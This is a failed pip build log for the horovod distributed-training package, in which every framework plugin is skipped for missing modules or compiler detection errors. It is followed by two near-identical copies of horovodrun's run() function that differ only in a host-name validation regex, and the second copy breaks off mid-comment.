[ 42%] Building CXX object gloo/CMakeFiles/gloo.dir/common/logging.cc.o
[ 45%] Building CXX object gloo/CMakeFiles/gloo.dir/mpi/context.cc.o
[ 48%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/context.cc.o
[ 51%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/file_store.cc.o
In file included from /tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:16:0:
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc: In destructor ‘gloo::mpi::MPIScope::~MPIScope()’:
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:141:58: warning: throw will always call terminate() [-Wterminate]
r.get_message_and_free(MakeString(__VA_ARGS__))); \
^
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:150:3: note: in expansion of macro ‘GLOO_ENFORCE_THAT_IMPL’
GLOO_ENFORCE_THAT_IMPL(Equals((x), (y)), #x " == " #y, __VA_ARGS__)
^~~~~~~~~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:43:3: note: in expansion of macro ‘GLOO_ENFORCE_EQ’
GLOO_ENFORCE_EQ(rv, MPI_SUCCESS);
^~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:141:58: note: in C++11 destructors default to noexcept
r.get_message_and_free(MakeString(__VA_ARGS__))); \
^
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:150:3: note: in expansion of macro ‘GLOO_ENFORCE_THAT_IMPL’
GLOO_ENFORCE_THAT_IMPL(Equals((x), (y)), #x " == " #y, __VA_ARGS__)
^~~~~~~~~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:43:3: note: in expansion of macro ‘GLOO_ENFORCE_EQ’
GLOO_ENFORCE_EQ(rv, MPI_SUCCESS);
^~~~~~~~~~~~~~~
[ 54%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/hash_store.cc.o
[ 57%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/prefix_store.cc.o
[ 60%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/store.cc.o
[ 63%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/address.cc.o
[ 66%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/buffer.cc.o
[ 69%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/context.cc.o
[ 72%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/device.cc.o
[ 75%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/pair.cc.o
[ 78%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/unbound_buffer.cc.o
[ 81%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/address.cc.o
[ 84%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/buffer.cc.o
[ 87%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/context.cc.o
[ 90%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/device.cc.o
[ 93%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/pair.cc.o
[ 96%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/unbound_buffer.cc.o
[100%] Linking CXX static library /tmp/pip-install-c74kecsx/horovod/build/temp.linux-x86_64-3.7/lib/mxnet/libgloo.a
[100%] Built target gloo
INFO: Unable to build MXNet plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 88, in check_mx_version
import mxnet as mx
ModuleNotFoundError: No module named 'mxnet'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1403, in build_extensions
build_mx_extension(self, options)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1000, in build_mx_extension
check_mx_version()
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 95, in check_mx_version
'import mxnet failed, is it installed?\n\n%s' % traceback.format_exc())
distutils.errors.DistutilsPlatformError: import mxnet failed, is it installed?
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 88, in check_mx_version
import mxnet as mx
ModuleNotFoundError: No module named 'mxnet'
error: None of TensorFlow, PyTorch, or MXNet plugins were built. See errors above.
----------------------------------------
Failed building wheel for horovod
Running setup.py clean for horovod
Failed to build horovod
Installing collected packages: horovod
Running setup.py install for horovod ... error
Complete output from command /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/bin/python3.7 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-c74kecsx/horovod/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-zuqdc9ob/install-record.txt --single-version-externally-managed --compile --install-headers /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include/site/python3.7/horovod:
running install
running build
running build_py
creating build
creating build/lib.linux-x86_64-3.7
creating build/lib.linux-x86_64-3.7/horovod
copying horovod/__init__.py -> build/lib.linux-x86_64-3.7/horovod
creating build/lib.linux-x86_64-3.7/horovod/_keras
copying horovod/_keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/_keras
copying horovod/_keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/_keras
creating build/lib.linux-x86_64-3.7/horovod/spark
copying horovod/spark/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark
creating build/lib.linux-x86_64-3.7/horovod/mxnet
copying horovod/mxnet/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/mxnet
copying horovod/mxnet/__init__.py -> build/lib.linux-x86_64-3.7/horovod/mxnet
creating build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/compression.py -> build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch
creating build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/util.py -> build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/basics.py -> build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/__init__.py -> build/lib.linux-x86_64-3.7/horovod/common
creating build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/task_fn.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/mpi_run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/gloo_run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run
creating build/lib.linux-x86_64-3.7/horovod/keras
copying horovod/keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/keras
copying horovod/keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/keras
creating build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/util.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/compression.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/__init__.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
creating build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/mpirun_exec_fn.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/task_service.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
creating build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/mpirun_rsh.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/job_id.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
creating build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib
copying horovod/torch/mpi_lib/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib
creating build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib_impl
copying horovod/torch/mpi_lib_impl/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib_impl
creating build/lib.linux-x86_64-3.7/horovod/run/common
copying horovod/run/common/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common
creating build/lib.linux-x86_64-3.7/horovod/run/task
copying horovod/run/task/task_service.py -> build/lib.linux-x86_64-3.7/horovod/run/task
copying horovod/run/task/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/task
creating build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/threads.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/cache.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/network.py -> build/lib.linux-x86_64-3.7/horovod/run/util
creating build/lib.linux-x86_64-3.7/horovod/run/rendezvous
copying horovod/run/rendezvous/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/rendezvous
copying horovod/run/rendezvous/http_server.py -> build/lib.linux-x86_64-3.7/horovod/run/rendezvous
creating build/lib.linux-x86_64-3.7/horovod/run/driver
copying horovod/run/driver/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/run/driver
copying horovod/run/driver/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/driver
creating build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/task_service.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
creating build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/env.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/secret.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/codec.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/timeout.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/safe_shell_exec.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/settings.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/host_hash.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/network.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
creating build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
copying horovod/tensorflow/keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
copying horovod/tensorflow/keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
running build_ext
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -std=c++11 -fPIC -O2 -Wall -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.cc -o build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.o -o build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.so
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_link_flags.cc -o build/temp.linux-x86_64-3.7/test_compile/test_link_flags.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib -Wl,--version-script=horovod.lds build/temp.linux-x86_64-3.7/test_compile/test_link_flags.o -o build/temp.linux-x86_64-3.7/test_compile/test_link_flags.so
INFO: Unable to build TensorFlow plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 72, in check_tf_version
import tensorflow as tf
ModuleNotFoundError: No module named 'tensorflow'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1375, in build_extensions
build_tf_extension(self, options)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 851, in build_tf_extension
check_tf_version()
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 79, in check_tf_version
'import tensorflow failed, is it installed?\n\n%s' % traceback.format_exc())
distutils.errors.DistutilsPlatformError: import tensorflow failed, is it installed?
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 72, in check_tf_version
import tensorflow as tf
ModuleNotFoundError: No module named 'tensorflow'
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -std=c++11 -fPIC -O2 -Wall -I/usr/local/include -pthread -Wl,-rpath -Wl,/usr/local/lib -Wl,--enable-new-dtags -L/usr/local/lib -lmpi -I/usr/local/include -pthread -Wl,-rpath -Wl,/usr/local/lib -Wl,--enable-new-dtags -L/usr/local/lib -lmpi -Ithird_party/HTTPRequest/include -Ithird_party/boost/assert/include -Ithird_party/boost/config/include -Ithird_party/boost/core/include -Ithird_party/boost/detail/include -Ithird_party/boost/iterator/include -Ithird_party/boost/lockfree/include -Ithird_party/boost/mpl/include -Ithird_party/boost/parameter/include -Ithird_party/boost/predef/include -Ithird_party/boost/preprocessor/include -Ithird_party/boost/static_assert/include -Ithird_party/boost/type_traits/include -Ithird_party/boost/utility/include -Ithird_party/eigen -Ithird_party/flatbuffers/include -Ithird_party/lbfgs/include -Ithird_party/gloo -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/torch/csrc/api/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/TH -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/THC -I/usr/local/cuda/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.cc -o build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.o -o build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.so
/bin/sh: 1: /usr/lib/gcc: Permission denied
INFO: Unable to determine version of the compiler /usr/lib/gcc.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 767, in determine_gcc_version
shell=True, universal_newlines=True).split('\n')
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/subprocess.py", line 395, in check_output
**kwargs).stdout
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/subprocess.py", line 487, in run
output=stdout, stderr=stderr)
subprocess.CalledProcessError: Command '/usr/lib/gcc -dM -E - </dev/null' returned non-zero exit status 126.
INFO: Unable to build PyTorch plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1389, in build_extensions
build_torch_extension_v2(self, options, torch_version)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1274, in build_torch_extension_v2
find_matching_gcc_compiler_path(candidate_compiler_version)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 801, in find_matching_gcc_compiler_path
if compiler_version == gxx_compiler_version:
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/distutils/version.py", line 46, in __eq__
c = self._cmp(other)
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/distutils/version.py", line 335, in _cmp
if self.version == other.version:
AttributeError: 'NoneType' object has no attribute 'version'
-- The CXX compiler identification is GNU 7.4.0
-- The C compiler identification is GNU 7.4.0
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Found MPI_C: /usr/local/lib/libmpi.so (found version "3.1")
-- Found MPI_CXX: /usr/local/lib/libmpi.so (found version "3.1")
-- Found MPI: TRUE (found version "3.1")
-- MPI include path: /usr/local/include
-- MPI libraries: /usr/local/lib/libmpi.so
-- Configuring done
-- Generating done
-- Build files have been written to: /tmp/pip-install-c74kecsx/horovod/build/temp.linux-x86_64-3.7/gloo/mxnet
Scanning dependencies of target gloo
[ 6%] Building CXX object gloo/CMakeFiles/gloo.dir/allreduce.cc.o
[ 6%] Building CXX object gloo/CMakeFiles/gloo.dir/allgather.cc.o
[ 9%] Building CXX object gloo/CMakeFiles/gloo.dir/algorithm.cc.o
[ 12%] Building CXX object gloo/CMakeFiles/gloo.dir/allgatherv.cc.o
[ 15%] Building CXX object gloo/CMakeFiles/gloo.dir/allreduce_local.cc.o
[ 18%] Building CXX object gloo/CMakeFiles/gloo.dir/barrier.cc.o
[ 21%] Building CXX object gloo/CMakeFiles/gloo.dir/broadcast.cc.o
[ 24%] Building CXX object gloo/CMakeFiles/gloo.dir/context.cc.o
[ 27%] Building CXX object gloo/CMakeFiles/gloo.dir/gather.cc.o
[ 30%] Building CXX object gloo/CMakeFiles/gloo.dir/reduce.cc.o
[ 33%] Building CXX object gloo/CMakeFiles/gloo.dir/scatter.cc.o
[ 36%] Building CXX object gloo/CMakeFiles/gloo.dir/types.cc.o
[ 39%] Building CXX object gloo/CMakeFiles/gloo.dir/common/linux.cc.o
[ 42%] Building CXX object gloo/CMakeFiles/gloo.dir/common/logging.cc.o
[ 45%] Building CXX object gloo/CMakeFiles/gloo.dir/mpi/context.cc.o
[ 48%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/context.cc.o
[ 51%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/file_store.cc.o
In file included from /tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:16:0:
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc: In destructor ‘gloo::mpi::MPIScope::~MPIScope()’:
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:141:58: warning: throw will always call terminate() [-Wterminate]
r.get_message_and_free(MakeString(__VA_ARGS__))); \
^
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:150:3: note: in expansion of macro ‘GLOO_ENFORCE_THAT_IMPL’
GLOO_ENFORCE_THAT_IMPL(Equals((x), (y)), #x " == " #y, __VA_ARGS__)
^~~~~~~~~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:43:3: note: in expansion of macro ‘GLOO_ENFORCE_EQ’
GLOO_ENFORCE_EQ(rv, MPI_SUCCESS);
^~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:141:58: note: in C++11 destructors default to noexcept
r.get_message_and_free(MakeString(__VA_ARGS__))); \
^
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:150:3: note: in expansion of macro ‘GLOO_ENFORCE_THAT_IMPL’
GLOO_ENFORCE_THAT_IMPL(Equals((x), (y)), #x " == " #y, __VA_ARGS__)
^~~~~~~~~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:43:3: note: in expansion of macro ‘GLOO_ENFORCE_EQ’
GLOO_ENFORCE_EQ(rv, MPI_SUCCESS);
^~~~~~~~~~~~~~~
[ 54%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/hash_store.cc.o
[ 57%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/prefix_store.cc.o
[ 60%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/store.cc.o
[ 63%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/address.cc.o
[ 66%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/buffer.cc.o
[ 69%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/context.cc.o
[ 72%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/device.cc.o
[ 75%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/pair.cc.o
[ 78%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/unbound_buffer.cc.o
[ 81%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/address.cc.o
[ 84%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/buffer.cc.o
[ 87%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/context.cc.o
[ 90%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/device.cc.o
[ 93%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/pair.cc.o
[ 96%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/unbound_buffer.cc.o
[100%] Linking CXX static library /tmp/pip-install-c74kecsx/horovod/build/temp.linux-x86_64-3.7/lib/mxnet/libgloo.a
[100%] Built target gloo
INFO: Unable to build MXNet plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 88, in check_mx_version
import mxnet as mx
ModuleNotFoundError: No module named 'mxnet'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1403, in build_extensions
build_mx_extension(self, options)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1000, in build_mx_extension
check_mx_version()
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 95, in check_mx_version
'import mxnet failed, is it installed?\n\n%s' % traceback.format_exc())
distutils.errors.DistutilsPlatformError: import mxnet failed, is it installed?
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 88, in check_mx_version
import mxnet as mx
ModuleNotFoundError: No module named 'mxnet'
error: None of TensorFlow, PyTorch, or MXNet plugins were built. See errors above.
----------------------------------------
Command "/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/bin/python3.7 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-c74kecsx/horovod/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-zuqdc9ob/install-record.txt --single-version-externally-managed --compile --install-headers /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include/site/python3.7/horovod" failed with error code 1 in /tmp/pip-install-c74kecsx/horovod/
|
ModuleNotFoundError
|
def run():
args = parse_args()
# if hosts are not specified, either parse from hostfile, or default as
# localhost
if not args.hosts:
if args.hostfile:
args.hosts = parse_host_files(args.hostfile)
else:
# Set hosts to localhost if not specified
args.hosts = "localhost:{np}".format(np=args.np)
host_list = args.hosts.split(",")
all_host_names = []
pattern = re.compile(r"^[\w.-]+:\d+$")
for host in host_list:
if not pattern.match(host.strip()):
raise ValueError(
"Invalid host input, please make sure it has "
"format as : worker-0:2,worker-1:2."
)
all_host_names.append(host.strip().split(":")[0])
# horovodrun has to finish all the checks before this timeout runs out.
if args.start_timeout:
start_timeout = args.start_timeout
else:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv("HOROVOD_START_TIMEOUT", "30"))
tmout = timeout.Timeout(
start_timeout,
message="Timed out waiting for {activity}. Please "
"check connectivity between servers. You "
"may need to increase the --start-timeout "
"parameter if you have too many servers.",
)
settings = hvd_settings.Settings(
verbose=2 if args.verbose else 0,
ssh_port=args.ssh_port,
key=secret.make_secret_key(),
timeout=tmout,
num_hosts=len(all_host_names),
num_proc=args.np,
hosts=args.hosts,
command=args.command,
)
# This cache stores the results of checks performed by horovodrun
# during the initialization step. It can be disabled by setting
# --disable-cache flag.
fn_cache = None
if not args.disable_cache:
params = ""
if args.np:
params += str(args.np) + " "
if args.hosts:
params += str(args.hosts) + " "
if args.ssh_port:
params += str(args.ssh_port)
parameters_hash = hashlib.md5(params.encode("utf-8")).hexdigest()
fn_cache = cache.Cache(
CACHE_FOLDER, CACHE_STALENESS_THRESHOLD_MINUTES, parameters_hash
)
if settings.verbose >= 2:
print("Filtering local host names.")
remote_host_names = network.filter_local_addresses(all_host_names)
if settings.verbose >= 2:
print("Remote host found: " + " ".join(remote_host_names))
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Checking ssh on all remote hosts.")
# Check if we can ssh into all remote hosts successfully.
_check_all_hosts_ssh_successful(
remote_host_names, args.ssh_port, fn_cache=fn_cache
)
if settings.verbose >= 2:
print("SSH was successful into all the remote hosts.")
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Testing interfaces on all the hosts.")
local_host_names = set(all_host_names) - set(remote_host_names)
# Find the set of common, routed interfaces on all the hosts (remote
# and local) and specify it in the args to be used by NCCL. It is
# expected that the following function will find at least one interface
# otherwise, it will raise an exception.
common_intfs = _driver_fn(
all_host_names, local_host_names, settings, fn_cache=fn_cache
)
if settings.verbose >= 2:
print("Interfaces on all the hosts were successfully checked.")
print("Common interface found: " + " ".join(common_intfs))
else:
if settings.verbose >= 2:
print("All hosts are local, finding the interfaces with address 127.0.0.1")
# If all the given hosts are local, find the interfaces with address
# 127.0.0.1
common_intfs = set()
for iface, addrs in net_if_addrs().items():
for addr in addrs:
if addr.family == AF_INET and addr.address == "127.0.0.1":
common_intfs.add(iface)
break
if len(common_intfs) == 0:
raise ValueError("No interface is found for address 127.0.0.1.")
if settings.verbose >= 2:
print("Local interface found " + " ".join(common_intfs))
if args.use_gloo:
if not gloo_built():
raise ValueError(
"Gloo support has not been built. If this is not expected, ensure CMake is installed "
"and reinstall Horovod with HOROVOD_WITH_GLOO=1 to debug the build error."
)
gloo_run(settings, remote_host_names, common_intfs)
elif args.use_mpi:
if not mpi_built():
raise ValueError(
"MPI support has not been built. If this is not expected, ensure MPI is installed "
"and reinstall Horovod with HOROVOD_WITH_MPI=1 to debug the build error."
)
mpi_run(settings, common_intfs)
else:
if mpi_built():
mpi_run(settings, common_intfs)
elif gloo_built():
gloo_run(settings, remote_host_names, common_intfs)
else:
raise ValueError(
"Neither MPI nor Gloo support has been built. Try reinstalling Horovod ensuring that "
"either MPI is installed (MPI) or CMake is installed (Gloo)."
)
|
def run():
args = parse_args()
# if hosts are not specified, either parse from hostfile, or default as
# localhost
if not args.hosts:
if args.hostfile:
args.hosts = parse_host_files(args.hostfile)
else:
# Set hosts to localhost if not specified
args.hosts = "localhost:{np}".format(np=args.np)
host_list = args.hosts.split(",")
all_host_names = []
pattern = re.compile(r"^[\w-]+:\d+$")
for host in host_list:
if not pattern.match(host.strip()):
raise ValueError(
"Invalid host input, please make sure it has "
"format as : worker-0:2,worker-1:2."
)
all_host_names.append(host.strip().split(":")[0])
# horovodrun has to finish all the checks before this timeout runs out.
if args.start_timeout:
start_timeout = args.start_timeout
else:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv("HOROVOD_START_TIMEOUT", "30"))
tmout = timeout.Timeout(
start_timeout,
message="Timed out waiting for {activity}. Please "
"check connectivity between servers. You "
"may need to increase the --start-timeout "
"parameter if you have too many servers.",
)
settings = hvd_settings.Settings(
verbose=2 if args.verbose else 0,
ssh_port=args.ssh_port,
key=secret.make_secret_key(),
timeout=tmout,
num_hosts=len(all_host_names),
num_proc=args.np,
hosts=args.hosts,
command=args.command,
)
# This cache stores the results of checks performed by horovodrun
# during the initialization step. It can be disabled by setting
# --disable-cache flag.
fn_cache = None
if not args.disable_cache:
params = ""
if args.np:
params += str(args.np) + " "
if args.hosts:
params += str(args.hosts) + " "
if args.ssh_port:
params += str(args.ssh_port)
parameters_hash = hashlib.md5(params.encode("utf-8")).hexdigest()
fn_cache = cache.Cache(
CACHE_FOLDER, CACHE_STALENESS_THRESHOLD_MINUTES, parameters_hash
)
if settings.verbose >= 2:
print("Filtering local host names.")
remote_host_names = network.filter_local_addresses(all_host_names)
if settings.verbose >= 2:
print("Remote host found: " + " ".join(remote_host_names))
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Checking ssh on all remote hosts.")
# Check if we can ssh into all remote hosts successfully.
_check_all_hosts_ssh_successful(
remote_host_names, args.ssh_port, fn_cache=fn_cache
)
if settings.verbose >= 2:
print("SSH was successful into all the remote hosts.")
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Testing interfaces on all the hosts.")
local_host_names = set(all_host_names) - set(remote_host_names)
# Find the set of common, routed interfaces on all the hosts (remote
# and local) and specify it in the args to be used by NCCL. It is
